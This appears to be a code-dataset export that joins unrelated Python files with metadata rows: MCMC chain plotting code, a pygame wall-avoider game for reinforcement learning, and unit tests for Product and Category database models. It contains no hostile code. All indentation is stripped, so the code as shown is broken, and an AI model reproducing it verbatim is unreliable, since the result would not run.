ax.plot(list(dict_of_trials.keys()), list(dict_of_trials.values()))
ax.set_ylabel('Loss value')
ax.set_xlabel('Beta value')
ax.set_title('How the beta loss changes with beta')
return fig, ax
def plot_chains(mcmc, figsize=(20, 20)):
"""Summary
Args:
mcmc (MCMC): Description
out_dir (str): Description
"""
params = [*mcmc.prior_ranges.keys()]
for param in params:
plt.figure(figsize=figsize)
plt.subplot(2,1,1)
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[0])
samples = np.array(df[param])
plt.plot(list(range(len(samples))), samples, label='chain {}'.format(i+1))
plt.xlabel("iterations")
plt.title("Accepted {} samples".format(param))
plt.legend()
plt.subplot(2,1,2)
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[1])
try:
samples = np.array(df[param])
plt.scatter(list(range(len(samples))), samples, s=4, label='chain {}'.format(i+1))
except:
continue
plt.xlabel("iterations")
plt.title("Rejected {} samples".format(param))
plt.legend()
for param in params:
plt.figure(figsize=(20, 10))
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[0])
samples = np.array(df[param])
mean = np.mean(samples)
sns.kdeplot(np.array(samples), bw=0.005*mean)
plt.title("Density plot of {} samples".format(param))
plt.show()
| 40.728155 | 104 | 0.586651 | 1,069 | 8,390 | 4.434986 | 0.213283 | 0.012656 | 0.016452 | 0.018561 | 0.325881 | 0.229066 | 0.166632 | 0.115587 | 0.094917 | 0.07973 | 0 | 0.018687 | 0.266508 | 8,390 | 205 | 105 | 40.926829 | 0.751706 | 0.00882 | 0 | 0.269006 | 0 | 0 | 0.109556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023392 | false | 0.005848 | 0.070175 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4186a83376db6719d09806172772089d522d0c98 | 12,828 | py | Python | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | Game-TestHuman.py | brian1985/rl-wall-avoider | c6c5d87f3693bfd27f39a4015f361773bf219cd3 | [
"MIT"
] | null | null | null | from random import randint, choice
from collections import deque
from time import sleep
import pygame, time
import numpy as np
"""
Code to use arduino as input
import serial
import re
board = serial.Serial("/dev/ttyACM0")
data = board.readline()
data = data.decode()
data = re.sub("[^0-9|]", "", data)
xyz = data.split("|")
x/y default is 512, 0 is left/down, 1024 right/up
z=0/1 with 1 unpressed and 0 pressed
"""
pygame.init()
######################################################################################
class Field:
def __init__(self, height=10, width=5):
self.width = width
self.height = height
self.body = np.zeros(shape=(self.height, self.width))
def update_field(self,walls, player):
try:
# Clear the field:
self.body = np.zeros(shape=(self.height, self.width))
# Put the walls on the field:
for wall in walls:
if not wall.out_of_range :
self.body[wall.y:min(wall.y+wall.height,self.height),:] = wall.body
# Put the player on the field:
self.body[player.y:player.y+player.height,
player.x:player.x+player.width] += player.body
except :
pass
######################################################################################
class Wall:
def __init__(self, height = 5, width=100, hole_width = 20,
y = 0, speed = 1, field = None):
self.height = height
self.width = width
self.hole_width = hole_width
self.y = y
self.speed = speed
self.field = field
self.body_unit = 1
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
self.out_of_range = False
self.create_hole()
def create_hole(self):
hole = np.zeros(shape = (self.height, self.hole_width))
hole_pos = randint(0,self.width-self.hole_width)
self.body[ : , hole_pos:hole_pos+self.hole_width] = 0
def move(self):
self.y += self.speed
self.out_of_range = True if ((self.y + self.height) > self.field.height) else False
######################################################################################
class Player:
def __init__(self, height = 5, max_width = 10 , width=2,
x = 0, y = 0, speed = 2):
self.height = height
self.max_width = max_width
self.width = width
self.x = x
self.y = y
self.speed = speed
self.body_unit = 2
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
self.stamina = 20
self.max_stamina = 20
def move(self, field, direction = 0 ):
'''
Moves the player :
- No change = 0
- left, if direction = 1
- right, if direction = 2
'''
val2dir = {0:0 , 1:-1 , 2:1}
direction = val2dir[direction]
next_x = (self.x + self.speed*direction)
if not (next_x + self.width > field.width or next_x < 0):
self.x += self.speed*direction
self.stamina -= 1
def change_width(self, action = 0):
'''
Change the player's width:
- No change = 0
- narrow by one unit = 3
- widen by one unit = 4
'''
val2act = {0:0 , 3:-1 , 4:1}
action = val2act[action]
new_width = self.width+action
player_end = self.x + new_width
if new_width <= self.max_width and new_width > 0 and player_end <= self.max_width:
self.width = new_width
self.body = np.ones(shape = (self.height, self.width))*self.body_unit
######################################################################################
class Environment:
P_HEIGHT = 2 # Height of the player
F_HEIGHT = 20 # Height of the field
W_HEIGHT = 2 # Height of the walls
WIDTH = 10 # Width of the field and the walls
MIN_H_WIDTH = 2 # Minimum width of the holes
MAX_H_WIDTH = 6 # Maximum width of the holes
MIN_P_WIDTH = 2 # Minimum Width of the player
MAX_P_WIDTH = 6 # Maximum Width of the player
HEIGHT_MUL = 30 # Height Multiplier (used to draw np.array as blocks in pygame )
WIDTH_MUL = 40 # Width Multiplier (used to draw np.array as blocks in pygame )
WINDOW_HEIGHT = (F_HEIGHT+1) * HEIGHT_MUL # Height of the pygame window
WINDOW_WIDTH = (WIDTH) * WIDTH_MUL # Widh of the pygame window
ENVIRONMENT_SHAPE = (F_HEIGHT,WIDTH,1)
ACTION_SPACE = [0,1,2,3,4]
ACTION_SPACE_SIZE = len(ACTION_SPACE)
PUNISHMENT = -100 # Punishment increment
REWARD = 10 # Reward increment
score = 0 # Initial Score
MOVE_WALL_EVERY = 4 # Every how many frames the wall moves.
MOVE_PLAYER_EVERY = 1 # Every how many frames the player moves.
frames_counter = 0
def __init__(self):
# Colors:
self.BLACK = (25,25,25)
self.WHITE = (255,255,255)
self.RED = (255, 80, 80)
self.BLUE = (80, 80, 255)
self.field = self.walls = self.player = None
self.current_state = self.reset()
self.val2color = {0:self.WHITE, self.walls[0].body_unit:self.BLACK,
self.player.body_unit:self.BLACK, self.MAX_VAL:self.RED}
def reset(self):
self.score = 0
self.frames_counter = 0
self.game_over = False
self.field = Field(height=self.F_HEIGHT, width=self.WIDTH )
w1 = Wall( height = self.W_HEIGHT, width=self.WIDTH,
hole_width = randint(self.MIN_H_WIDTH,self.MAX_H_WIDTH),
field = self.field)
self.walls = deque([w1])
p_width = randint(self.MIN_P_WIDTH,self.MAX_P_WIDTH)
self.player = Player( height = self.P_HEIGHT, max_width = self.WIDTH,
width = p_width,
x = randint(0,self.field.width-p_width),
y = int(self.field.height*0.7), speed = 1)
self.MAX_VAL = self.player.body_unit + w1.body_unit
# Update the field :
self.field.update_field(self.walls, self.player)
observation = self.field.body/self.MAX_VAL
return observation
def print_text(self, WINDOW = None, text_cords = (0,0), center = False,
text = "", color = (0,0,0), size = 32):
pygame.init()
font = pygame.font.Font('freesansbold.ttf', size)
text_to_print = font.render(text, True, color)
textRect = text_to_print.get_rect()
if center:
textRect.center = text_cords
else:
textRect.x = text_cords[0]
textRect.y = text_cords[1]
WINDOW.blit(text_to_print, textRect)
def step(self, action):
global score_increased
self.frames_counter += 1
reward = 0
# If the performed action is (move) then player.move method is called:
if action in [1,2]:
self.player.move(direction = action, field = self.field)
# If the performed action is (change_width) then player.change_width method is called:
if action in [3,4]:
self.player.change_width(action = action)
# Move the wall one step (one step every MOVE_WALL_EVERY frames):
if self.frames_counter % self.MOVE_WALL_EVERY == 0:
# move the wall one step
self.walls[-1].move()
# reset the frames counter
self.frames_counter = 0
# Update the field :
self.field.update_field(self.walls, self.player)
# If the player passed a wall successfully increase the reward +1
if ((self.walls[-1].y) == (self.player.y + self.player.height)) and not score_increased :
reward += self.REWARD
self.score += self.REWARD
# Increase player's stamina every time it passed a wall successfully
self.player.stamina = min(self.player.max_stamina, self.player.stamina+10)
# score_increased : a flag to make sure that reward increases once per wall
score_increased = True
# Lose Conditions :
# C1 : The player hits a wall
# C2 : Player's width was far thinner than hole's width
# C3 : Player fully consumed its stamina (energy)
lose_conds = [self.MAX_VAL in self.field.body,
((self.player.y == self.walls[-1].y) and (self.player.width < (self.walls[-1].hole_width-1))),
self.player.stamina <=0]
# If one lose condition or more happend, the game ends:
if True in lose_conds:
self.game_over = True
reward = self.PUNISHMENT
return self.field.body/self.MAX_VAL, reward, self.game_over
# Check if a wall moved out of the scene:
if self.walls[-1].out_of_range:
# Create a new wall
self.walls[-1] = Wall( height = self.W_HEIGHT, width = self.WIDTH,
hole_width = randint(self.MIN_H_WIDTH,self.MAX_H_WIDTH),
field = self.field)
score_increased = False
# Return New Observation , reward, game_over(bool)
return self.field.body/self.MAX_VAL, reward, self.game_over
def render(self, WINDOW = None, human=False):
if human:
################ Check Actions #####################
action = 0
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
self.game_over = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
action = 1
if event.key == pygame.K_RIGHT:
action = 2
if event.key == pygame.K_UP:
action = 4
if event.key == pygame.K_DOWN:
action = 3
################## Step ############################
_,reward, self.game_over = self.step(action)
################ Draw Environment ###################
WINDOW.fill(self.WHITE)
self.field.update_field(self.walls, self.player)
for r in range(self.field.body.shape[0]):
for c in range(self.field.body.shape[1]):
pygame.draw.rect(WINDOW,
self.val2color[self.field.body[r][c]],
(c*self.WIDTH_MUL, r*self.HEIGHT_MUL, self.WIDTH_MUL, self.HEIGHT_MUL))
self.print_text(WINDOW = WINDOW, text_cords = (self.WINDOW_WIDTH // 2, int(self.WINDOW_HEIGHT*0.1)),
text = str(self.score), color = self.RED, center = True)
self.print_text(WINDOW = WINDOW, text_cords = (0, int(self.WINDOW_HEIGHT*0.9)),
text = str(self.player.stamina), color = self.RED)
pygame.display.update()
######################################################################################
# Make an environment object
env = Environment()
# Change wall speed to 3 (one step every 3 frames)
env.MOVE_WALL_EVERY = 3
# Initialize some variables
WINDOW = pygame.display.set_mode((env.WINDOW_WIDTH, env.WINDOW_HEIGHT))
clock = pygame.time.Clock()
win = False
winning_score = 100
# Repeaat the game untill the player win (got a score of winning_score) or quits the game.
while not win:
score_increased = False
game_over = False
_ = env.reset()
pygame.display.set_caption("Game")
while not game_over:
clock.tick(27)
env.render(WINDOW = WINDOW, human=True)
game_over = env.game_over
#####################################################
sleep(0.5)
WINDOW.fill(env.WHITE)
if env.score >= winning_score:
win = True
env.print_text(WINDOW = WINDOW, text_cords = (env.WINDOW_WIDTH // 2, env.WINDOW_HEIGHT// 2),
text = f"You Win - Score : {env.score}", color = env.RED, center = True)
else:
env.print_text(WINDOW = WINDOW, text_cords = (env.WINDOW_WIDTH // 2, env.WINDOW_HEIGHT// 2),
text = f"Game Over - Score : {env.score}", color = env.RED, center = True)
pygame.display.update()
######################################################################################
| 41.514563 | 116 | 0.528687 | 1,590 | 12,828 | 4.138994 | 0.159748 | 0.032822 | 0.014891 | 0.017323 | 0.26774 | 0.198146 | 0.16183 | 0.144203 | 0.127944 | 0.116092 | 0 | 0.022829 | 0.323901 | 12,828 | 308 | 117 | 41.649351 | 0.735962 | 0.145385 | 0 | 0.17757 | 0 | 0 | 0.008123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060748 | false | 0.004673 | 0.023364 | 0 | 0.214953 | 0.037383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4186fcc1ce90afaf587b5f5bd0c8099ee8a70d32 | 26,536 | py | Python | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | backend/models_test.py | OmarThinks/PIM-API | b7259dd64b397844b26d5e190df5a8701be0ff85 | [
"MIT"
] | null | null | null | import json
import unittest
from models import (NotReceived, validate_key,
MyModel, Product,Category,ProductCategory,
populate_tables, db_drop_and_create_all,get_dict,)
#from app import create_app
from __init__ import session
unittest.TestLoader.sortTestMethodsUsing = None
class modelsTestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
#db_drop_and_create_all()
#create_app()
# create and configure the app
#self.app = create_app(testing=True) #Flask(__name__)
#self.client = self.app.test_client
#db.app = self.app
#db.init_app(self.app)
#db.create_all()
pass
def tearDown(self):
"""Executed after reach test"""
print("_+++++++++++++++++++++++++++++++++_")
#Note: Tests are run alphapetically
def test_001_test(self):
self.assertEqual(1,1)
print("Test 1:Hello, Tests!")
def test_002_test(self):
db_drop_and_create_all()
print("Test 2:db_drop_and_create_all")
def test_0a_1_1_1_validate_key(self):
the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived()}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key))
self.assertEqual([False,False,True,True,True,False],validated)
print("Test 0a_1_1_1 : validate_key: success")
def test_0a_1_1_2_validate_key(self):
the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived()}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key,id=True))
self.assertEqual([True,False,True,True,True,False],validated)
print("Test 0a_1_1_2 : validate_key: success")
def test_0a_1_1_3_validate_key(self):
the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived()}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key,dangerous = True))
self.assertEqual([False,True,True,True,True,False],validated)
print("Test 0a_1_1_3 : validate_key: success")
def test_0a_1_1_4_validate_key(self):
the_dict = {"id":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived()}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key,dangerous = True))
self.assertEqual([False,True,True,True,True,False],validated)
print("Test 0a_1_1_4 : validate_key: success")
def test_0a_1_1_5_validate_key(self):
the_dict = {"iD":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived(), "unsupported":{}}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key,dangerous = True,
unsupported=True))
#print(validated)
self.assertEqual([False,True,True,True,True,False,False],validated)
print("Test 0a_1_1_5 : validate_key: success")
def test_0a_1_1_6_validate_key(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
#print(type(type(product)))
the_dict = {"ID":41,"password":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived(), "unsupported1":{}, "unsupported2":product}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key,dangerous = True,
unsupported=True))
#print(validated)
self.assertEqual([False,True,True,True,True,False,False,True],validated)
print("Test 0a_1_1_6 : validate_key: success")
def test_0a_1_1_7_validate_key(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
the_dict = {"Id":41,"paSSword":"abc","username":"tryu",
"bool1":True,"bool2":False,
"nr":NotReceived(), "unsupported1":{}, "unsupported2":product}
validated = []
for key in the_dict:
validated.append(validate_key(the_dict,key, unsupported=False))
self.assertEqual([False,False,True,True,True,False,False,False],validated)
print("Test 0a_1_1_7 : validate_key: success")
def test_0a_1_1_8_validate_key(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
class tst(object):
def __init__(self):
self.Id = 41
self.paSSword = "abc"
self.username = "tryu"
self.bool1 = True
self.bool2 = False
self.nr = NotReceived()
self.unsupported1 = {}
self.unsupported2 = product
validation_obj = tst()
validated = []
for key in ["Id","paSSword","username","bool1","bool2","nr","unsupported1",
"unsupported2"]:
validated.append(validate_key(validation_obj,key, unsupported=False))
self.assertEqual([False,False,True,True,True,False,False,False],validated)
print("Test 0a_1_1_8 : validate_key: with object")
def test_0a_1_2_1_get_dict(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
class tst(object):
def __init__(self):
self.Id = 41
self.paSSword = "abc"
self.username = "tryu"
self.bool1 = True
self.bool2 = False
self.nr = NotReceived()
self.unsupported1 = {}
self.unsupported2 = product
validation_obj = tst()
the_dict = get_dict(validation_obj)
self.assertEqual(the_dict,{"username":"tryu","bool1":True,"bool2":False})
the_dict = get_dict(validation_obj, id=True,dangerous=True)
self.assertEqual(the_dict,{"username":"tryu","bool1":True,"bool2":False,
"paSSword":"abc","Id":41})
print("Test 0a_1_2_1 : get_dict: with object")
def test_0a_1_2_2_get_dict(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
the_dict = get_dict(product, id=True,dangerous=True)
product.insert()
the_dict = get_dict(product, id=True,dangerous=True)
self.assertEqual(the_dict,{"name":"Cheese",
"price":50.4,"id":1,"quantity":7.89,"code":789456611})
product.delete()
print("Test 0a_1_2_2 : get_dict: with object")
def test_0a_1_2_3_get_dict(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
the_dict = {"Id":41,"paSSword":"abc","username":"tryu","bool1":True,
"bool2":False,
"nr":NotReceived(),"unsupported1":{},"unsupported2":product}
validated = get_dict(the_dict, id=True,dangerous=True)
self.assertEqual(validated,{"username":"tryu","bool1":True,"bool2":False,
"paSSword":"abc","Id":41})
validated = get_dict(the_dict)
self.assertEqual(validated,{"username":"tryu","bool1":True,"bool2":False})
print("Test 0a_1_2_3 : get_dict: with dict")
def test_0a_1_2_1_MyModel(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
self.assertEqual(product.name,"Cheese")
self.assertEqual(product.price,50.4)
self.assertEqual(product.quantity,7.89)
self.assertEqual(product.code,789456611)
print("Test 0a_1_2_1 : MyModel: success")
def test_0a_1_2_2_MyModel(self):
try:
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611, bla="123")
except Exception as e:
self.assertEqual(str(e),"'bla' is an invalid "+
"keyword argument for Product")
print("Test 0a_1_2_2 : MyModel: success")
def test_0a_1_2_3_MyModel(self):
product = Product(name="Cheese",price=50.4,
quantity=7.89, code=789456611)
self.assertEqual(product.simple(),{"id":None,"name":"Cheese",
"price":50.4, "quantity":7.89, "code":789456611})
product.insert()
self.assertEqual(product.simple(),{"name":"Cheese",
"price":50.4, "quantity":7.89, "code":789456611, "id":1})
#prod = Product(name="789",price=123,seller_id=1)
#self.assertEqual(prod.simple(),{"name":"789","price":123,
# "seller_id":1,"id":None,"in_stock":None,"seller":None})
#prod.insert()
#self.assertEqual(prod.simple(),{"name":"789","price":123,
# "seller_id":1,"id":1,"in_stock":True})
#prod.delete()
product.delete()
print("Test 0a_1_2_3 : MyModel: success")
def test_0a_1_2_4_MyModel(self):
#Trying to add the product with id, and seeing how the d will be neglected
product = Product(name="Cheese",price=50.4,
quantity=7.89, id=10000000,code=789456611)
self.assertEqual(product.simple(),{"id":None,"name":"Cheese",
"price":50.4, "quantity":7.89, "code":789456611})
print("Test 0a_1_2_4 : MyModel: success")
def test_0a_1_3_1_MyModel(self):
db_drop_and_create_all()
# Creating the product
product_to_del = Product(name="Cheese",price=50.4,
quantity=7.89, id=10000000,code=789456611)
product_to_del.insert()
#self.assertEqual(len(session.query(Product).all()),1)
self.assertEqual(len(Product.query().all()),1)
"""prod_to_del1 = Product(name = "abc",price=456,seller_id=user_to_del.id)
prod_to_del2 = Product(name = "abcdef",price=4567,seller_id=user_to_del.id)
db.session.add_all([prod_to_del1,prod_to_del2])
db.session.commit()
self.assertEqual(len(Product.query.all()),2)
order_to_del1 = Order(
user_id = user_to_del.id,product_id=prod_to_del1.id,amount=1)
order_to_del2 = Order(
user_id = user_to_del.id,product_id=prod_to_del2.id,amount=3)
order_to_del3 = Order(
user_id = user_to_del.id,product_id=prod_to_del2.id,amount=5)
db.session.add_all([order_to_del1,order_to_del2,order_to_del3])
db.session.commit()
self.assertEqual(len(Order.query.all()),3)"""
#img_to_delete1=Image(seller_id=1,name="abc",formatting = "png")
#img_to_delete2=Image(seller_id=1,name="abce",formatting = "jpg")
#db.session.add_all([img_to_delete1,img_to_delete2])
#db.session.commit()
#self.assertEqual(len(Image.query.all()),2)
# Trying to delete
#img_to_delete2.delete()
#self.assertEqual(len(Image.query.all()),1)
"""order_to_del3.delete()
self.assertEqual(len(Order.query.all()),2)
prod_to_del2.delete()
self.assertEqual(len(Order.query.all()),1)
self.assertEqual(len(Product.query.all()),1)"""
product_to_del.delete()
#self.assertEqual(len(Image.query.all()),0)
"""self.assertEqual(len(Order.query.all()),0)
self.assertEqual(len(Product.query.all()),0)
self.assertEqual(len(Product.query.all()),0)"""
print("Test 0a_1_3_1 : MyModel: relationships")
def test_0a_1_4_1_MyModel(self):
# Testing update
# Creating the product
product_to_del = Product(name="Cheese",price=50.4,
quantity=7.89, id=10000000,code=789456611)
product_to_del.insert()
product_dict = get_dict(product_to_del,id=True,dangerous=True)
self.assertEqual(product_dict,{"id":1,"name":"Cheese",
"price":50.4, "quantity":7.89,"code":789456611})
product_to_del.update(id=14,name="QUU",price=90,
quantity=7000,code=0)
product_dict = get_dict(product_to_del,id=True,dangerous=True)
self.assertEqual(product_dict,{"id":1,"name":"QUU",
"price":90, "quantity":7000,"code":0})
product_to_del.delete()
print("Test 0a_1_4_1 : MyModel: update")
def test_0a_1_5_1_MyModel_deep(self):
# Testing update
# Creating the product
product_to_del = Product(name="Cheese",price=50.4,
quantity=7.89, id=10000000,code=789456611)
product_to_del.insert()
#prod = Product(name="789",price=123,seller_id=1)
#prod.insert()
#print(product_to_del.deep())
self.assertEqual(product_to_del.deep(),
{'categories': [], 'code': 789456611, 'id': 1,
'name': 'Cheese', 'price': 50.4, 'quantity': 7.89})
"""self.assertEqual(prod.deep(),{'id': 1, 'in_stock': True,
'name': '789', 'orders': [], 'price': 123.0, 'seller':
{'id': 1, 'username': 'abc'}, 'seller_id': 1})"""
print("Test 0a_1_5_1 : MyModel: deep")
def test_a_1_000_product_intro(self):
print("")
print("")
print("_+++++++++++++++++++++++++++++++++_")
print("_+++++++++++++++++++ Models : 1 ) Product ++_")
print("_+++++++++++++++++++++++++++++++++_")
print("")
print("")
def test_a_1_001_product_insert(self):
db_drop_and_create_all()
product1 = Product(name="Cheese",price=50.4,
quantity=7.89, id=10000000,code=789456611)
product1.insert()
products = Product.query().all()
self.assertEqual(len(products),1)
print("Test a_1_1: product insert")
def test_a_1_002_product_update(self):
product1 = Product.query().get(1)
#product1.name = "modified"
product1.update(name="modified")
product_1 = Product.query().get(1)
self.assertEqual(product_1.name,"modified")
print("Test a_1_2: product update")
def test_a_1_003_product_delete(self):
product1 = Product.query().get(1)
product1.delete()
products = Product.query().all()
self.assertEqual(len(products),0)
print("Test a_1_3: product delete")
def test_a_1_004_populate(self):
populate_tables()
products = Product.query().all()
self.assertEqual(len(products),5)
print("Test a_1_4: Populate Tables")
def test_a_1_005_product_values(self):
product = Product.query().get(1)
self.assertEqual(product.id,1)
self.assertEqual(product.name,"Cheese")
self.assertEqual(product.price,50.4)
self.assertEqual(product.quantity,7.89)
self.assertEqual(product.code,789456611)
#print(product.categories)
self.assertEqual(json.loads(str(product.categories)),
[{"category_id": 1, "id": 1, "product_id": 1},
{"category_id": 2, "id": 2, "product_id": 1},
{"category_id": 3, "id": 3, "product_id": 1},
{"category_id": 4, "id": 4, "product_id": 1},
{"category_id": 5, "id": 5, "product_id": 1}])
"""for prod in user.products:
self.assertEqual(type(prod.id),int)
self.assertEqual(type(prod.price),float)
self.assertEqual(type(prod.in_stock),bool)
self.assertEqual(type(prod.seller_id),int)
for order in user.orders:
self.assertEqual(type(order.id),int)
self.assertEqual(type(order.user_id),int)
self.assertEqual(type(order.product_id),int)
self.assertEqual(type(order.amount),int)"""
"""for image in user.images:
self.assertEqual(type(image.id),int)
self.assertEqual(type(image.seller_id),int)
self.assertEqual(type(image.name),str)
self.assertEqual(type(image.formatting),str)"""
print("Test a_1_5: product values")
def test_a_1_006_product_insert_wrong(self):
products = Product.query().all()
old_records_number = len(products)
try:
#This code will not be executed
#There are missing required parameters
product = Product()
product.insert()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"True != False")
products = Product.query().all()
new_records_number = len(products)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_1_6: product insert with missing"+
"required parameters")
def test_a_1_007_product_delete_wrong(self):
products = Product.query().all()
old_records_number = len(products)
try:
#This code will not be executed
#There is no product with the number 0
product1 = Product.query().get(0)
product1.delete()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"'NoneType' "+
"object has no attribute 'delete'")
#print(str(e))
products = Product.query().all()
new_records_number = len(products)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_1_7: product delete mistake, non-existent"+
"product id")
def test_a_1_008_product_simple(self):
product = Product.query().get(1).simple()
#print(product)
self.assertEqual(product,{'code': 789456611,
'id': 1, 'price': 50.4, 'name':
'Cheese', 'quantity': 7.89})
print("Test a_1_8: product simple")
def test_a_1_009_product_relationship_order(self):
product = Product.query().get(1)
"""orders=user.orders
orders_ids=[order.id for order in orders]
self.assertEqual(1 in orders_ids,True)
self.assertEqual(2 in orders_ids,False)
self.assertEqual(3 in orders_ids,False)
self.assertEqual(4 in orders_ids,True)"""
print("Test a_1_9:product relationship_order")
def test_a_1_010_product_delete_relationships(self):
#measuring lengths beofre actions
#populate_tables()
products_before = len(Product.query().all())
categories_before = len(Category.query().all())
pc_before = len(ProductCategory.query().all())
# deleting the product
prod_to_del = Product.query().get(1)
prod_to_del.delete()
self.assertEqual(len(Product.query().all()),products_before-1)
self.assertEqual(len(Category.query().all()),categories_before)
self.assertEqual(len(ProductCategory.query().all()),pc_before-5)
print("Test a_1_10: product delete relationships")
def test_a_1_011_product_deep(self):
#measuring lengths beofre actions
product = Product.query().get(4)
#print(product.deep())
self.assertEqual(product.deep(),
{'categories': [], 'code': 8444441, 'id': 4,
'name': 'Mobile', 'price': 20.1, 'quantity': 9.0})
print("Test a_1_11: product deep")
def test_a_2_000_category_intro(self):
print("")
print("")
print("_+++++++++++++++++++++++++++++++++_")
print("_+++++++++++++++++++ Models : 2 ) Category ++_")
print("_+++++++++++++++++++++++++++++++++_")
print("")
print("")
def test_a_2_001_category_insert(self):
db_drop_and_create_all()
category1 = Category(name="Cheese")
category1.insert()
categories = Category.query().all()
self.assertEqual(len(categories),1)
print("Test a_2_1: category insert")
def test_a_2_002_category_update(self):
category1 = Category.query().get(1)
#category1.name = "modified"
category1.update(name="modified")
category_1 = Category.query().get(1)
self.assertEqual(category_1.name,"modified")
print("Test a_2_2: category update")
def test_a_2_003_category_delete(self):
category1 = Category.query().get(1)
category1.delete()
categories = Category.query().all()
self.assertEqual(len(categories),0)
print("Test a_2_3: category delete")
def test_a_2_004_populate(self):
populate_tables()
categories = Category.query().all()
self.assertEqual(len(categories),13)
print("Test a_2_4: Populate Tables")
def test_a_2_005_category_values(self):
category = Category.query().get(1)
self.assertEqual(category.id,1)
self.assertEqual(category.name,"Electronics")
self.assertEqual(category.parent_id,None)
self.assertEqual(category.parent,None)
self.assertEqual(str(category.children),
'[{"id": 2, "name": "Camera", "parent_id": 1}]')
#print(category.products)
self.assertEqual(json.loads(str(category.products)),
[{"category_id": 1, "id": 1, "product_id": 1},
{"category_id": 1, "id": 6, "product_id": 2},
{"category_id": 1, "id": 11, "product_id": 3}])
category = Category.query().get(4)
self.assertEqual(category.id,4)
self.assertEqual(category.name,"Manual Cameras")
self.assertEqual(category.parent_id,2)
self.assertEqual(category.parent,Category.query().get(2))
#print(category.children)
self.assertEqual(str(category.children),
'[]')
#print(category.products)
self.assertEqual(json.loads(str(category.products)),
[{"category_id": 4, "id": 4, "product_id": 1},
{"category_id": 4, "id": 9, "product_id": 2},
{"category_id": 4, "id": 14, "product_id": 3}])
print("Test a_2_5: category values")
def test_a_2_006_category_insert_wrong(self):
categories = Category.query().all()
old_records_number = len(categories)
try:
#This code will not be executed
#There are missing required parameters
category = Category()
category.insert()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"True != False")
categories = Category.query().all()
new_records_number = len(categories)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_2_6: category insert with missing"+
"required parameters")
def test_a_2_007_category_delete_wrong(self):
categories = Category.query().all()
old_records_number = len(categories)
try:
#This code will not be executed
#There is no category with the number 0
category1 = Category.query().get(0)
category1.delete()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"'NoneType' "+
"object has no attribute 'delete'")
#print(str(e))
categories = Category.query().all()
new_records_number = len(categories)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_2_7: category delete mistake, non-existent"+
"category id")
def test_a_2_008_category_simple(self):
category = Category.query().get(1).simple()
#print(category)
self.assertEqual(category,{'id': 1, 'name': 'Electronics',
'parent_id': None})
category = Category.query().get(4).simple()
#print(category)
self.assertEqual(category,{'id': 4, 'name':
'Manual Cameras', 'parent_id': 2})
print("Test a_2_8: category simple")
def test_a_2_009_category_relationship_order(self):
category = Category.query().get(1)
category.parent=None
category = Category.query().get(4)
print("Test a_2_9:category relationship")
def test_a_2_010_category_delete_relationships(self):
products_before = len(Product.query().all())
categories_before = len(Category.query().all())
pc_before = len(ProductCategory.query().all())
# deleting the product
category_to_del = Category.query().get(1)
category_to_del.delete()
self.assertEqual(len(Product.query().all()),products_before)
self.assertEqual(len(Category.query().all()),categories_before-1)
